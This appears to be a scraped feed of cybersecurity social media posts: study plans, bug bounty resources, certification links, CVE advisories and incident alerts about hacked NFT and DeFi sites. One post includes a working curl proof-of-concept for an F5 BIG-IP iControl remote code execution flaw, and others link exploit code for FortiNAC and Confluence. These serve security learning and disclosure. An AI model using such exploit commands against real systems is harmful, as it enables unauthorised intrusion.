Security Study Plan
Complete Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on...
github.com/jassics/securi
#cybersecurity #infosec #pentesting
t.me/hackgit/8490
Anil bhatt’s Tweets
Curating all the write-ups on bug-bounties in one place
some help would be nice :)
if you come across any write-up or write one yourself after getting a bounty, pls add here
The best way to become an Alpha Smart Contract Auditor is to read and understand past exploits/findings 🔐
This is a super large list of companies and their reports 🗒
Remember read, read and read again 🕵♂️
I hacked into a CMS that allowed me to alter search results and take over millions of accounts.
How did I do it? Well, it all started with a simple click in … 👀
This is the story of #BingBang 🧵⬇️
☃️Mobile Application Penetration Testing Cheat Sheet☃️
Find Cheatsheets on both
➡️Android App Pentesting
➡️iOS App Pentesting
#bugbounty #cybersecurity #infosec
Experimenting with GPT-3 for Detecting Security Vulnerabilities in Code
Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allow… t.me/hackgit/7653
GitHub - horizon3ai/CVE-2022-39952: POC for CVE-2022-39952 -
Researchers Warn of Critical Security Bugs in Schneider Electric Modicon PLCs thehackernews.com/2023/02/resear via
eJPT: lnkd.in/epAG2R39
eCPPT: lnkd.in/dRCVbvMT
eMAPT: lnkd.in/dpdEV_UY
eWPT: lnkd.in/d5g4w22n
eWPTX: lnkd.in/dhEvuNuW
eCXD: lnkd.in/dwN_q6y4
eCPTXv2: lnkd.in/dEiVaZBG
#Hacking #Infosec #Bugbounty #cyber #security #tech #dfir #AI
Awesome Two Part Series by on a vulnerability chain from unauthenticated user to full RCE in Intel’s Data Center Manager
Auth Bypass (CVE-2022-33942): rcesecurity.com/2022/11/from-z
SQLi to RCE (CVE-2022-21225): rcesecurity.com/2022/12/from-z
#infosec #hacking #bugbounty
Two more days before our Black Friday specials!
And we just reached 90K followers! Let's celebrate!
We are going to give a 1-month voucher to 90 people who RT this tweet and follow (picked randomly)!
📑 Root cause analysis from past DeFi incidents.
Hope this stuff can help devs to avoid the same mistakes as much as possible.
Now covered 95 incidents.
wooded-meter-1d8.notion.site/0e85e02c5ed34d
#DeFi #Web3
Introducing a smart way to list and filter CVEs
Filter by epss, priority, zeroday, exploit and more
Available at: vi.strobes.co/cves/list/?que
🚨 New advisory was just published! 🚨
A vulnerability in pfSense allows authenticated users to cause the product to execute arbitrary code - this in turn would allow an attacker to compromise the machine on which the pfSense is installed:
ssd-disclosure.com/ssd-advisory-p
Thread about hunting on the main application 🧵
1. Check the login process
- Do they allow signup with email or Google etc
- Do they allow you to signup with the email
- what is the content-type of the signup/login page
- when you enter valid cred, on which page you
🚨BREAKING: Bored Ape Yacht Club and Otherside Metaverse Discord servers have been hacked. Millions worth of #NFTs reportedly stolen.
Exploit for CVE-2022-26134 (Atlassian Confluence Unauthenticated RCE) 🔥
Based on @Naqwada_'s POC: github.com/Nwqda/CVE-2022
At least 2,196 servers are still vulnerable. Also, if you had one of these servers exposed to the Internet, assume compromise and review ASAP 🚨
. discovers zero-day exploit impacting all current versions of Atlassian Confluence Server and Data Center. Attackers deploy in-memory Java implant to evade detection. Read more in our latest blog post: volexity.com/blog/2022/06/0 #DFIR #ThreatIntel #InfoSec
🚨 CRITICAL ALERT
A severe 0-day vulnerability called #Follina has been exposed (since May 27th) in MS Word Documents.
It could allow hackers to take full control of your computer, in some cases WITHOUT even opening the file. 🧵
1/
Update:
Initially we thought the issue may have been with AWS, however after further diagnosis, we have identified that the hacker has managed to exploit Godaddy, essentially they have hijacked our domain and copied our codebase and in the process changed the swap parameters
⚠️DO NOT SWAP⚠️
Similar to other protocols hosted on , QuickSwap has been domain hijacked
Funds in LPs, the Dragon's Lair, Syrup Pools, & YOUR wallets are safe
Only swaps have been affected. Please DO NOT SWAP
We are working to resolve the problem & will update ASAP
Security Alert: If you are on the CoinGecko website and you are being prompted by your Metamask to connect to this site, this is a SCAM. Don't connect it. We are investigating the root cause of this issue.
F5 BIG-IP iControl RCE (CVE-2021-22986)
execute arbitrary system commands
create or delete files
disable services
PoC #1
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
attackerkb.com/topics/J6pWeg5
Don't waste $13k on courses and bootcamps. 💰
Top 10 Youtube channels to learn Web3 for FREE.
A Thread 🧵
🚨Cloud Hacking Tools🚨
AWS - github.com/RhinoSecurityL
GCP - github.com/RhinoSecurityL
Azure - github.com/Azure/Stormspo
Multi Cloud - github.com/nccgroup/Scout
Multi Cloud - github.com/aquasecurity/c
#bugbountytips #bugbounty #redteam #Pentesting #PenTest #infosec #aws #gcp #Azure
I couldn't attend #NahamCon2022, yesterday, now watching the recording on Twitch. For easy session selection I've added the direct links with time codes in the thread below (requires subscription to 's Twitch channel, but it's absolutely worth it!) 👇🧵